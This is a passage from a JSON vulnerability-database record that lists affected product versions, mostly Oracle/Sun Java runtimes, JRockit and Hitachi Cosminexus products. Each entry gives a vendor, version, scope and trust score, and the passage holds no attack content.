"hitachi", "version": "606-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus client version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.3" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.6" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.4" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.5" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.4" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.4" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.3" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.3" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.5" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.5" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.1" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server enterprise version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus client version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "sdk,", "scope": "lt", "trust": 0.8, "vendor": "ibm", "version": "java 2 technology edition 5.0 sr 16 fp 4" }, { "model": "sdk,", "scope": "lt", "trust": 0.8, "vendor": "ibm", "version": "java technology edition 6 sr 15" }, { "model": "sdk,", "scope": "lt", "trust": 0.8, "vendor": "ibm", "version": "java technology edition 6.0.1 sr 7" }, { "model": "sdk,", "scope": "lt", "trust": 0.8, "vendor": "ibm", "version": "java technology edition 7 sr 6" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 51" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 60" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "7 update 40" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 51" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 60" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "7 update 40" }, { "model": "java se", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "embedded 7 update 40" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus application server enterprise version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "505-00" }, { "model": "cosminexus studio version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus application server enterprise version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { 